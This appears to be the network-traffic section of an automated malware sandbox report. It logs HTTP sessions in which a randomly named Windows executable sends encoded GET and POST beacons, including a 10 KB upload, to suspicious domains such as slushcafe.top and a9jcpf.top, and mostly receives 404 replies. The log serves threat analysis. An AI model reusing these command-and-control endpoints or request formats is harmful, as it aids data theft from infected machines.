                                                    Data Raw: 65 66 4d 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 30 6a 72 42 64 57 68 31 52 39 44 6b 46 70 59 55 78 44 30 33 56 56 6b 42 4d 66 46 75 2f 71 75 67 42 61 74 4a 4b 72 75 64 56 46 65 6b 52 59 69 38 4e 69 32 6b 36 47 6a 68 32 4b 32 6d 6f 41 47 72 2b 6e 71 52 73 46 6b 72 65 6b 5a 48 49 73 66 37 37 48 52 44 30 75 41 36 55 62 6d 5a 67 77 65 49 34 6c 52 4f 79 70 33 54 6c 74 55 76 45 64 69 2f 63 4f 2f 31 6a 58 4a 47 36 44 6e 55 41 37 63 57 7a 67 56 58 65 37 61 73 73 61 5a 52 31 56 38 4d 62 4f 69 53 7a 7a 5a 45 6c 61 4a 72 63 36 6c 54 67 7a 4b 42 6a 4e 4a 44 55 61 55 47 72 65 67 49 62 72 38 61 58 55 44 6f 51 52 52 51 52 73 51 57 63 7a 6f 51 38 5a 4a 35 62 6e 59 76 6b 36 36 6c 6f 49 55 5a 79 50 69 6f 33 6e 6e 53 65 75 64 5a 42 63 61 37 45 2b 33 74 69 4c 61 34 57 67 62 76 4b 6f 2f 51 30 74 61 50 30 55 72 50 6c 66 7a 72 4b 57 6c 58 43 6d 4a 56 6e 47 49 79 43 74 49 35 35 51 33 58 34 35 46 4b 43 7a 79 35 4b 4e 48 4b 6b 71 36 76 39 69 49 7a 59 74 72 75 34 50 6a 51 59 59 61 57 41 7a 52 4c 58 35 79 47 58 6f 58 33 46 63 [TRUNCATED]
                                                    Data Ascii: efM=9pMmvcz73uDu0jrBdWh1R9DkFpYUxD03VVkBMfFu/qugBatJKrudVFekRYi8Ni2k6Gjh2K2moAGr+nqRsFkrekZHIsf77HRD0uA6UbmZgweI4lROyp3TltUvEdi/cO/1jXJG6DnUA7cWzgVXe7assaZR1V8MbOiSzzZElaJrc6lTgzKBjNJDUaUGregIbr8aXUDoQRRQRsQWczoQ8ZJ5bnYvk66loIUZyPio3nnSeudZBca7E+3tiLa4WgbvKo/Q0taP0UrPlfzrKWlXCmJVnGIyCtI55Q3X45FKCzy5KNHKkq6v9iIzYtru4PjQYYaWAzRLX5yGXoX3FcnVFAOEE5aQY/9pQkSm4k/ssiDLBDTblE+4x9QsKPGUGuk4Z76uwURxkjuJQq3FhLFMPUpeAJxvPEeRciasAAeKh+QBGoTeCTpzHWfSwLyYkE+AwKkJmFJBlbJkBDDvSmNMbKHwd2sCaorf1E4rFMoTwjIt0DkXX+s2V3vUMQ2xlpqOgGwWPmrSVbn/9KHtrpnMlStG+u1/F2rGkAH5OgTOjSfiQ3xKVbj6vBLX9M6rTBdwsI3dcEzYMD7lWyVna/4DAAf9qmZpKXwCb/W2+yS1Y+GwJpDYXtOs99Q4zPo7+q/xat1qFkFIC7xtpDVIKT3p04/z+pGOlGcozUoTQy9UgRt+zayis4zRrhH3AwW4nRFy9/HVgjLrPFlkvbOf39saXpZ5HbUgVhRHUvw8HJXK9Ic9tjGcyY3PSTsTuyqQozg/PYyNfBMzQZg6PvNJXmjTuchjE6ZnF9gFtG2/Iwij4/Vz83pNDGAqq7vcaUMRmHGinXrHt9LaVsyowKP3Uu2HJxHAb/SORW3mT4NA+GgMzP7hK1rar3N/ABqTsq/HGpAlD5YdGqsrJgnB7LgJvB8QU2FKEEoQyoIZFGpK3IeXre8ZtLQs60UzimYVJXiuwELvmnYZkG3cMEk7wS86ANEdPf/YjyIDs1vxvziQ8TSHoAQ5ot1GiQEL [TRUNCATED]
                                                    Aug 5, 2024 15:32:49.398022890 CEST361INHTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:49 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.45542264.226.69.42802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:51.302417040 CEST436OUTGET /rdfm/?GTP=uhqpjxIPh&efM=wrkGspiQ383g8BvQawprffb7FcgpmXJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvZFoLMOaF6UBG/sMUSe6LmxyUxmV5i7nd1eA= HTTP/1.1
                                                    Host: www.kacotae.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:32:51.922563076 CEST699INHTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:51 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 552
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.455423203.161.55.102802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:57.138952017 CEST706OUTPOST /irn0/ HTTP/1.1
                                                    Host: www.slushcafe.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.slushcafe.top
                                                    Referer: http://www.slushcafe.top/irn0/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 39 57 36 57 4d 4c 6a 61 62 38 2b 48 69 58 32 66 55 58 48 50 49 42 4c 47 2b 51 6a 57 47 58 6d 45 68 50 4a 2b 55 66 35 71 32 52 70 6f 38 59 53 72 76 78 55 52 43 4c 56 31 33 67 76 59 41 57 75 39 56 7a 73 46 64 68 68 66 64 64 4c 6e 43 58 6b 46 50 75 6f 5a 32 45 6d 75 63 4a 46 33 63 59 73 77 48 62 46 6d 50 58 56 49 45 67 5a 52 62 33 54 6f 37 67 43 67 45 66 65 38 78 62 69 71 42 55 6e 50 4b 77 2f 4a 75 63 37 55 6d 38 52 6b 46 77 54 43 39 4e 2b 55 4d 4a 41 56 38 52 69 70 76 70 58 74 4c 6f 59 39 68 6e 76 5a 35 67 30 42 34 49 74 61 72 54 57 4e 4e 67 3d 3d
                                                    Data Ascii: efM=mmMV1xSFqhYG9W6WMLjab8+HiX2fUXHPIBLG+QjWGXmEhPJ+Uf5q2Rpo8YSrvxURCLV13gvYAWu9VzsFdhhfddLnCXkFPuoZ2EmucJF3cYswHbFmPXVIEgZRb3To7gCgEfe8xbiqBUnPKw/Juc7Um8RkFwTC9N+UMJAV8RipvpXtLoY9hnvZ5g0B4ItarTWNNg==
                                                    Aug 5, 2024 15:32:57.775000095 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Mon, 05 Aug 2024 13:32:57 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.455424203.161.55.102802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:59.676848888 CEST726OUTPOST /irn0/ HTTP/1.1
                                                    Host: www.slushcafe.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.slushcafe.top
                                                    Referer: http://www.slushcafe.top/irn0/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 2f 7a 79 57 4e 73 33 61 64 63 2b 41 73 33 32 66 64 33 48 4c 49 42 48 47 2b 52 6e 47 47 6c 43 45 68 76 35 2b 56 65 35 71 7a 52 70 6f 6f 6f 53 75 69 52 55 47 43 4c 5a 54 33 69 4c 59 41 57 36 39 56 79 63 46 64 51 68 63 63 4e 4c 6c 4f 33 6b 48 4c 75 6f 5a 32 45 6d 75 63 4a 52 52 63 59 55 77 48 6f 64 6d 41 53 70 4a 59 51 5a 57 53 58 54 6f 74 51 44 70 45 66 65 4f 78 61 75 45 42 53 37 50 4b 79 33 4a 75 49 76 56 78 73 52 71 59 41 53 67 30 39 62 34 4e 62 67 63 32 67 69 47 6f 4a 48 51 4f 75 4a 6e 77 57 4f 4f 72 67 51 79 6c 50 6b 75 6d 51 72 45 57 67 76 70 55 75 68 4b 7a 39 42 69 2f 39 4c 6a 72 7a 57 57 76 7a 30 3d
                                                    Data Ascii: efM=mmMV1xSFqhYG/zyWNs3adc+As32fd3HLIBHG+RnGGlCEhv5+Ve5qzRpoooSuiRUGCLZT3iLYAW69VycFdQhccNLlO3kHLuoZ2EmucJRRcYUwHodmASpJYQZWSXTotQDpEfeOxauEBS7PKy3JuIvVxsRqYASg09b4Nbgc2giGoJHQOuJnwWOOrgQylPkumQrEWgvpUuhKz9Bi/9LjrzWWvz0=
                                                    Aug 5, 2024 15:33:00.270761967 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Mon, 05 Aug 2024 13:33:00 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.455425203.161.55.102802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:02.206785917 CEST10808OUTPOST /irn0/ HTTP/1.1
                                                    Host: www.slushcafe.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.slushcafe.top
                                                    Referer: http://www.slushcafe.top/irn0/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 2f 7a 79 57 4e 73 33 61 64 63 2b 41 73 33 32 66 64 33 48 4c 49 42 48 47 2b 52 6e 47 47 6c 4b 45 67 65 5a 2b 55 35 6c 71 30 52 70 6f 72 6f 53 76 69 52 56 45 43 49 70 50 33 69 32 6c 41 53 4b 39 55 52 45 46 66 6a 35 63 58 4e 4c 6c 47 58 6b 47 50 75 6f 4d 32 41 36 69 63 4a 42 52 63 59 55 77 48 75 78 6d 4a 6e 56 4a 4c 41 5a 52 62 33 54 6b 37 67 43 4d 45 66 58 35 78 61 36 36 42 45 4c 50 45 78 66 4a 68 64 37 56 79 4d 52 6f 62 41 53 47 30 39 6e 6e 4e 62 4e 6c 32 67 57 73 6f 4c 62 51 50 70 4d 6f 68 46 2b 30 70 6a 30 76 78 38 4d 2b 6e 58 57 4a 58 43 43 57 62 37 38 51 6a 4d 46 58 6b 65 2b 36 77 57 61 65 35 6d 4f 74 67 49 36 43 52 35 45 67 35 6b 4f 76 46 74 79 38 57 69 37 63 68 4a 61 65 4e 6c 76 68 62 43 63 7a 4c 39 36 4c 35 39 47 6f 4f 4a 47 30 36 52 68 71 59 62 41 6b 71 4c 6e 72 66 58 57 33 61 34 7a 64 4b 78 6c 38 45 35 43 6a 48 44 2b 62 67 41 59 49 72 6d 47 33 44 71 79 51 50 59 41 59 66 52 47 72 70 78 6c 7a 49 41 66 33 4d 43 56 6f 58 58 51 44 2b 65 7a 55 54 47 [TRUNCATED]
                                                    Data Ascii: efM=mmMV1xSFqhYG/zyWNs3adc+As32fd3HLIBHG+RnGGlKEgeZ+U5lq0RporoSviRVECIpP3i2lASK9UREFfj5cXNLlGXkGPuoM2A6icJBRcYUwHuxmJnVJLAZRb3Tk7gCMEfX5xa66BELPExfJhd7VyMRobASG09nnNbNl2gWsoLbQPpMohF+0pj0vx8M+nXWJXCCWb78QjMFXke+6wWae5mOtgI6CR5Eg5kOvFty8Wi7chJaeNlvhbCczL96L59GoOJG06RhqYbAkqLnrfXW3a4zdKxl8E5CjHD+bgAYIrmG3DqyQPYAYfRGrpxlzIAf3MCVoXXQD+ezUTGD0pwFGsfPBn4jJdZAWg6bvKVnh9kLs5EeDLdkCQypa4qQz2ETZR4R1OuVfyZSU3equpPb208G0PWhYIywgfH3czRsMaFJox4/YUZH7Mckc/P1nTM4ciN29HyLK31IvASX31FUpTug4LoW4qFbtdgP8Lz/CpnwXgTWN3xe4Gvyv7sE8z01NJN6Z6+pbY6enZ2frsbQ+DpnDfVO/2U5m1RTxviJns3rzAzKx2tURfTFuhiNAGaA5Hu1LAP9MUE+Y4UwGXbBcHbMXhXNmxJxWFbR17yffvBt8sYB1j+Zk2uTDFDrIF7T7wiyibOfqUZQZG4zQq+wgGASBiNw/HkxuqqRTw4xo1pLuZasNgrN7atQA2a3mPHQAAoBTzH6OGQUMd7efj2K18MyuOPwc/gLC2xPpWez6wRBHggH1rZMs+u1sRiybrUUzRelCgIKqtRT5hszNsgq4hKVt4hmgZCBfIKzQ1LmfmJSyAmnoy2p4QyuobGEJf/BDIlJ/qQSHuQF/wCo6Psv3AkDBcHQPgBfI7ICv8IRo7/lXTdZGpcpMlaGwt+lwhhmzfeUh0My2nenmxjpj04C6ifRo1IAH5l4HgboJvwKxKmtsTYBOc3Erh3s0zHkr35jw5pmP7H5nUztERGlkc9y9DWzpqx6G6bwlolJFJO8fAdcbc9op [TRUNCATED]
                                                    Aug 5, 2024 15:33:02.852524996 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Mon, 05 Aug 2024 13:33:02 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.455426203.161.55.102802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:04.736814976 CEST438OUTGET /irn0/?efM=rkk12BbGqxBZ8yyVdqr4fumsqySnbS/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdycpy6GTweDeod91OQcupKfuQbLLwzDVUdZDA=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.slushcafe.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:33:05.338709116 CEST548INHTTP/1.1 404 Not Found
                                                    Date: Mon, 05 Aug 2024 13:33:05 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.455427216.83.33.140802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:10.931991100 CEST697OUTPOST /mpex/ HTTP/1.1
                                                    Host: www.a9jcpf.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.a9jcpf.top
                                                    Referer: http://www.a9jcpf.top/mpex/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 37 30 77 42 6f 56 4e 75 55 4b 73 79 4b 64 30 6d 58 45 33 47 42 66 36 58 76 72 44 6b 61 53 31 73 64 51 78 63 33 58 55 35 2b 6f 38 6a 61 41 72 38 58 39 35 75 6e 61 64 31 57 52 76 57 72 37 62 43 65 37 74 42 74 50 32 4e 7a 31 38 65 57 39 54 61 61 53 32 57 68 76 69 6b 63 53 4a 4f 58 7a 56 62 74 73 59 32 36 63 2f 66 4b 6e 41 5a 58 49 47 57 2f 45 73 6b 41 65 6d 6e 55 35 74 30 43 6e 57 75 4b 2b 4f 4f 4d 42 30 41 62 64 6d 74 67 7a 76 50 31 69 72 37 74 6e 56 59 42 44 38 30 37 6e 76 64 4b 6f 43 71 4f 6b 31 6f 53 73 61 42 4a 51 33 31 57 49 32 71 51 3d 3d
                                                    Data Ascii: efM=UZXPUba8LAvof70wBoVNuUKsyKd0mXE3GBf6XvrDkaS1sdQxc3XU5+o8jaAr8X95unad1WRvWr7bCe7tBtP2Nz18eW9TaaS2WhvikcSJOXzVbtsY26c/fKnAZXIGW/EskAemnU5t0CnWuK+OOMB0AbdmtgzvP1ir7tnVYBD807nvdKoCqOk1oSsaBJQ31WI2qQ==
                                                    Aug 5, 2024 15:33:11.866707087 CEST208INHTTP/1.1 530
                                                    Date: Mon, 05 Aug 2024 13:33:11 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: cdn
